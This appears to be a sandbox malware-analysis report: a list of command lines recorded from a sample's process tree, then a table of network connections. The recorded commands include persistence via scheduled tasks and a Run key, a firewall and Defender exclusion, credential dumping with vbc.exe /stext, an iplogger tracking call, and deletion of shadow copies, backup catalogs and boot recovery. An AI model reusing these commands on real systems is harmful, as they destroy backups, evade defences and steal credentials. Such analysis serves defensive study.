"C:\Users\Admin\Desktop\6.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
C:\Users\Admin\Desktop\6.exe
"C:\Users\Admin\Desktop\6.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
C:\Program Files (x86)\Microsoft\DesktopLayer.exe
"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://iplogger.org/2bB2s6
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "8" /sc ONLOGON /tr "'C:\Documents and Settings\8.exe'" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "7" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\LockApprove.wma\7.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\sc\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\WerFault\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\L2SecHC\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\mpr\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0osCMtBs5W.bat"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___TSE06_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___OFH6S_.txt
C:\Windows\system32\wbem\wmic.exe
"C:\oad\s\nr\..\..\..\Windows\edk\iukg\ln\..\..\..\system32\uhknq\..\wbem\wwra\wb\tixbg\..\..\..\wmic.exe" shadowcopy delete
C:\Windows\System32\L2SecHC\dllhost.exe
"C:\Windows\System32\L2SecHC\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C AT /delete /yes
C:\Windows\SysWOW64\at.exe
AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe"
C:\Windows\SysWOW64\at.exe
AT /delete /yes
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF1E.tmp.bat""
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\ProgramData\AdobeReader\GeforceUpdater.exe
"C:\ProgramData\AdobeReader\GeforceUpdater.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn MicrosoftEdgeUpdateTaskMachineCoreCor /tr C:\ProgramData\AdobeReader\GeforceUpdater.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn MicrosoftEdgeUpdateTaskMachineCoreCor /tr C:\ProgramData\AdobeReader\GeforceUpdater.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MicrosoftEdgeUpdateTaskMachineCoreCor" /tr "C:\ProgramData\AdobeReader\GeforceUpdater.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im E
C:\Windows\SysWOW64\PING.EXE
ping -n 1 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kcitlubheisxcn434" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5336 -ip 5336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 840
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kcitlubheisxcn434" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5336 -ip 5336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5336 -ip 5336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5336 -ip 5336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5336 -ip 5336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 1000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 1008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5336 -ip 5336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5336 -ip 5336
C:\Windows\SysWOW64\taskkill.exe
taskkill /im A5D66A~1.EXE /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c taskkill /im A5D66A~1.EXE /f & erase C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE & exit
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c taskkill /im "A5D66A~1.EXE" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE" & exit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\ProgramData\AdobeReader\GeforceUpdater.exe
C:\ProgramData\AdobeReader\GeforceUpdater.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x40c
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4544 -ip 4544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 912
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 8.8.8.8:53 | stats.walliant.com | udp |
| US | 8.8.8.8:53 | api.joinmassive.com | udp |
| US | 172.67.189.175:443 | stats.walliant.com | tcp |
| US | 18.172.89.91:443 | api.joinmassive.com | tcp |
| US | 8.8.8.8:53 | 91.89.172.18.in-addr.arpa | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 128.31.0.39:9101 | tcp | |
| US | 8.8.8.8:53 | unicorpbrunei.com | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| IN | 103.14.122.111:80 | unicorpbrunei.com | tcp |
| US | 8.8.8.8:53 | 111.122.14.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.189.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.bing.com | udp |
| RU | 91.218.114.4:80 | 91.218.114.4 | tcp |
| US | 8.8.8.8:53 | 4.114.218.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| RU | 91.218.114.4:80 | 91.218.114.4 | tcp |
| US | 104.16.154.36:80 | whatismyipaddress.com | tcp |
| US | 104.16.154.36:443 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | 36.154.16.104.in-addr.arpa | udp |
| RU | 91.218.114.11:80 | 91.218.114.11 | tcp |
| IE | 93.107.12.0:6893 | udp | |
| IE | 93.107.12.1:6893 | udp | |
| IE | 93.107.12.2:6893 | udp | |
| IE | 93.107.12.3:6893 | udp | |
| IE | 93.107.12.4:6893 | udp | |
| IE | 93.107.12.5:6893 | udp | |
| IE | 93.107.12.6:6893 | udp | |
| IE | 93.107.12.7:6893 | udp | |
| IE | 93.107.12.8:6893 | udp | |
| IE | 93.107.12.9:6893 | udp | |
| IE | 93.107.12.10:6893 | udp | |
| IE | 93.107.12.11:6893 | udp | |
| IE | 93.107.12.12:6893 | udp | |
| IE | 93.107.12.13:6893 | udp | |
| IE | 93.107.12.14:6893 | udp | |
| IE | 93.107.12.15:6893 | udp | |
| IE | 93.107.12.16:6893 | udp | |
| IE | 93.107.12.17:6893 | udp | |
| IE | 93.107.12.18:6893 | udp | |
| IE | 93.107.12.19:6893 | udp | |
| IE | 93.107.12.20:6893 | udp | |
| IE | 93.107.12.21:6893 | udp | |
| IE | 93.107.12.22:6893 | udp | |
| IE | 93.107.12.23:6893 | udp | |
| IE | 93.107.12.24:6893 | udp | |
| IE | 93.107.12.25:6893 | udp | |
| IE | 93.107.12.26:6893 | udp | |
| IE | 93.107.12.27:6893 | udp | |
| IE | 93.107.12.28:6893 | udp | |
| IE | 93.107.12.29:6893 | udp | |
| IE | 93.107.12.30:6893 | udp | |
| IE | 93.107.12.31:6893 | udp | |
| TR | 95.1.200.0:6893 | udp | |
| TR | 95.1.200.1:6893 | udp | |
| TR | 95.1.200.2:6893 | udp | |
| TR | 95.1.200.3:6893 | udp | |
| TR | 95.1.200.4:6893 | udp | |
| TR | 95.1.200.5:6893 | udp | |
| TR | 95.1.200.6:6893 | udp | |
| TR | 95.1.200.7:6893 | udp | |
| TR | 95.1.200.8:6893 | udp | |
| TR | 95.1.200.9:6893 | udp | |
| TR | 95.1.200.10:6893 | udp | |
| TR | 95.1.200.11:6893 | udp | |
| TR | 95.1.200.12:6893 | udp | |
| TR | 95.1.200.13:6893 | udp | |
| TR | 95.1.200.14:6893 | udp | |
| TR | 95.1.200.15:6893 | udp | |
| TR | 95.1.200.16:6893 | udp | |
| TR | 95.1.200.17:6893 | udp | |
| TR | 95.1.200.18:6893 | udp | |
| TR | 95.1.200.19:6893 | udp | |
| TR | 95.1.200.20:6893 | udp | |
| TR | 95.1.200.21:6893 | udp | |
| TR | 95.1.200.22:6893 | udp | |
| TR | 95.1.200.23:6893 | udp | |
| TR | 95.1.200.24:6893 | udp | |
| TR | 95.1.200.25:6893 | udp | |
| TR | 95.1.200.26:6893 | udp | |
| TR | 95.1.200.27:6893 | udp | |
| TR | 95.1.200.28:6893 | udp | |
| TR | 95.1.200.29:6893 | udp | |
| TR | 95.1.200.30:6893 | udp | |
| TR | 95.1.200.31:6893 | udp | |
| FR | 87.98.176.0:6893 | udp | |
| FR | 87.98.176.1:6893 | udp | |
| FR | 87.98.176.2:6893 | udp | |
| FR | 87.98.176.3:6893 | udp | |
| FR | 87.98.176.4:6893 | udp | |
| FR | 87.98.176.5:6893 | udp | |
| FR | 87.98.176.6:6893 | udp | |
| FR | 87.98.176.7:6893 | udp | |
| FR | 87.98.176.8:6893 | udp | |
| FR | 87.98.176.9:6893 | udp | |
| FR | 87.98.176.10:6893 | udp | |
| FR | 87.98.176.11:6893 | udp | |
| FR | 87.98.176.12:6893 | udp | |
| FR | 87.98.176.13:6893 | udp | |
| FR | 87.98.176.14:6893 | udp | |
| FR | 87.98.176.15:6893 | udp | |
| FR | 87.98.176.16:6893 | udp | |
| FR | 87.98.176.17:6893 | udp | |
| FR | 87.98.176.18:6893 | udp | |
| FR | 87.98.176.19:6893 | udp | |
| FR | 87.98.176.20:6893 | udp | |
| FR | 87.98.176.21:6893 | udp | |
| FR | 87.98.176.22:6893 | udp | |
| FR | 87.98.176.23:6893 | udp | |
| FR | 87.98.176.24:6893 | udp | |
| FR | 87.98.176.25:6893 | udp | |
| FR | 87.98.176.26:6893 | udp | |
| FR | 87.98.176.27:6893 | udp | |
| FR | 87.98.176.28:6893 | udp | |
| FR | 87.98.176.29:6893 | udp | |
| FR | 87.98.176.30:6893 | udp | |
| FR | 87.98.176.31:6893 | udp | |
| FR | 87.98.176.32:6893 | udp | |
| FR | 87.98.176.33:6893 | udp | |
| FR | 87.98.176.34:6893 | udp | |
| FR | 87.98.176.35:6893 | udp | |
| FR | 87.98.176.36:6893 | udp | |
| FR | 87.98.176.37:6893 | udp | |
| FR | 87.98.176.38:6893 | udp | |
| FR | 87.98.176.39:6893 | udp | |
| FR | 87.98.176.40:6893 | udp | |
| FR | 87.98.176.41:6893 | udp | |
| FR | 87.98.176.42:6893 | udp | |
| FR | 87.98.176.43:6893 | udp | |
| FR | 87.98.176.44:6893 | udp | |
| FR | 87.98.176.45:6893 | udp | |
| FR | 87.98.176.46:6893 | udp | |
| FR | 87.98.176.47:6893 | udp | |
| FR | 87.98.176.48:6893 | udp | |
| FR | 87.98.176.49:6893 | udp | |
| FR | 87.98.176.50:6893 | udp | |
| FR | 87.98.176.51:6893 | udp | |
| FR | 87.98.176.52:6893 | udp | |
| FR | 87.98.176.53:6893 | udp | |
| FR | 87.98.176.54:6893 | udp | |
| FR | 87.98.176.55:6893 | udp | |
| FR | 87.98.176.56:6893 | udp | |
| FR | 87.98.176.57:6893 | udp | |
| FR | 87.98.176.58:6893 | udp | |
| FR | 87.98.176.59:6893 | udp | |
| FR | 87.98.176.60:6893 | udp | |
| FR | 87.98.176.61:6893 | udp | |
| FR | 87.98.176.62:6893 | udp | |
| FR | 87.98.176.63:6893 | udp | |
| FR | 87.98.176.64:6893 | udp | |
| FR | 87.98.176.65:6893 | udp | |
| FR | 87.98.176.66:6893 | udp | |
| FR | 87.98.176.67:6893 | udp | |
| FR | 87.98.176.68:6893 | udp | |
| FR | 87.98.176.69:6893 | udp | |
| FR | 87.98.176.70:6893 | udp | |
| FR | 87.98.176.71:6893 | udp | |
| FR | 87.98.176.72:6893 | udp | |
| FR | 87.98.176.73:6893 | udp | |
| FR | 87.98.176.74:6893 | udp | |
| FR | 87.98.176.75:6893 | udp | |
| FR | 87.98.176.76:6893 | udp | |
| FR | 87.98.176.77:6893 | udp | |
| FR | 87.98.176.78:6893 | udp | |
| FR | 87.98.176.79:6893 | udp | |
| FR | 87.98.176.80:6893 | udp | |
| FR | 87.98.176.81:6893 | udp | |
| FR | 87.98.176.82:6893 | udp | |
| FR | 87.98.176.83:6893 | udp | |
| FR | 87.98.176.84:6893 | udp | |
| FR | 87.98.176.85:6893 | udp | |
| FR | 87.98.176.86:6893 | udp | |
| FR | 87.98.176.87:6893 | udp | |
| FR | 87.98.176.88:6893 | udp | |
| FR | 87.98.176.89:6893 | udp | |
| FR | 87.98.176.90:6893 | udp | |
| FR | 87.98.176.91:6893 | udp | |
| FR | 87.98.176.92:6893 | udp | |
| FR | 87.98.176.93:6893 | udp | |
| FR | 87.98.176.94:6893 | udp | |
| FR | 87.98.176.95:6893 | udp | |
| FR | 87.98.176.96:6893 | udp | |
| FR | 87.98.176.97:6893 | udp | |
| FR | 87.98.176.98:6893 | udp | |
| FR | 87.98.176.99:6893 | udp | |
| FR | 87.98.176.100:6893 | udp | |
| FR | 87.98.176.101:6893 | udp | |
| FR | 87.98.176.102:6893 | udp | |
| FR | 87.98.176.103:6893 | udp | |
| FR | 87.98.176.104:6893 | udp | |
| FR | 87.98.176.105:6893 | udp | |
| FR | 87.98.176.106:6893 | udp | |
| FR | 87.98.176.107:6893 | udp | |
| FR | 87.98.176.108:6893 | udp | |
| FR | 87.98.176.109:6893 | udp | |
| FR | 87.98.176.110:6893 | udp | |
| FR | 87.98.176.111:6893 | udp | |
| FR | 87.98.176.112:6893 | udp | |
| FR | 87.98.176.113:6893 | udp | |
| FR | 87.98.176.114:6893 | udp | |
| FR | 87.98.176.115:6893 | udp | |
| FR | 87.98.176.116:6893 | udp | |
| FR | 87.98.176.117:6893 | udp | |
| FR | 87.98.176.118:6893 | udp | |
| FR | 87.98.176.119:6893 | udp | |
| FR | 87.98.176.120:6893 | udp | |
| FR | 87.98.176.121:6893 | udp | |
| FR | 87.98.176.122:6893 | udp | |
| FR | 87.98.176.123:6893 | udp | |
| FR | 87.98.176.124:6893 | udp | |
| FR | 87.98.176.125:6893 | udp | |
| FR | 87.98.176.126:6893 | udp | |
| FR | 87.98.176.127:6893 | udp | |
| FR | 87.98.176.128:6893 | udp | |
| FR | 87.98.176.129:6893 | udp | |
| FR | 87.98.176.130:6893 | udp | |
| FR | 87.98.176.131:6893 | udp | |
| FR | 87.98.176.132:6893 | udp | |
| FR | 87.98.176.133:6893 | udp | |
| FR | 87.98.176.134:6893 | udp | |
| FR | 87.98.176.135:6893 | udp | |
| FR | 87.98.176.136:6893 | udp | |
| FR | 87.98.176.137:6893 | udp | |
| FR | 87.98.176.138:6893 | udp | |
| FR | 87.98.176.139:6893 | udp | |
| FR | 87.98.176.140:6893 | udp | |
| FR | 87.98.176.141:6893 | udp | |
| FR | 87.98.176.142:6893 | udp | |
| FR | 87.98.176.143:6893 | udp | |
| FR | 87.98.176.144:6893 | udp | |
| FR | 87.98.176.145:6893 | udp | |
| FR | 87.98.176.146:6893 | udp | |
| FR | 87.98.176.147:6893 | udp | |
| FR | 87.98.176.148:6893 | udp | |
| FR | 87.98.176.149:6893 | udp | |
| FR | 87.98.176.150:6893 | udp | |
| FR | 87.98.176.151:6893 | udp | |
| FR | 87.98.176.152:6893 | udp | |
| FR | 87.98.176.153:6893 | udp | |
| FR | 87.98.176.154:6893 | udp | |
| FR | 87.98.176.155:6893 | udp | |
| FR | 87.98.176.156:6893 | udp | |
| FR | 87.98.176.157:6893 | udp | |
| FR | 87.98.176.158:6893 | udp | |
| FR | 87.98.176.159:6893 | udp | |
| FR | 87.98.176.160:6893 | udp | |
| FR | 87.98.176.161:6893 | udp | |
| FR | 87.98.176.162:6893 | udp | |
| FR | 87.98.176.163:6893 | udp | |
| FR | 87.98.176.164:6893 | udp | |
| FR | 87.98.176.165:6893 | udp | |
| FR | 87.98.176.166:6893 | udp | |
| FR | 87.98.176.167:6893 | udp | |
| FR | 87.98.176.168:6893 | udp | |
| FR | 87.98.176.169:6893 | udp | |
| FR | 87.98.176.170:6893 | udp | |
| FR | 87.98.176.171:6893 | udp | |
| FR | 87.98.176.172:6893 | udp | |
| FR | 87.98.176.173:6893 | udp | |
| FR | 87.98.176.174:6893 | udp | |
| FR | 87.98.176.175:6893 | udp | |
| FR | 87.98.176.176:6893 | udp | |
| FR | 87.98.176.177:6893 | udp | |
| FR | 87.98.176.178:6893 | udp | |
| FR | 87.98.176.179:6893 | udp | |
| FR | 87.98.176.180:6893 | udp | |
| FR | 87.98.176.181:6893 | udp | |
| FR | 87.98.176.182:6893 | udp | |
| FR | 87.98.176.183:6893 | udp | |
| FR | 87.98.176.184:6893 | udp | |
| FR | 87.98.176.185:6893 | udp | |
| FR | 87.98.176.186:6893 | udp | |
| FR | 87.98.176.187:6893 | udp | |
| FR | 87.98.176.188:6893 | udp | |
| FR | 87.98.176.189:6893 | udp | |
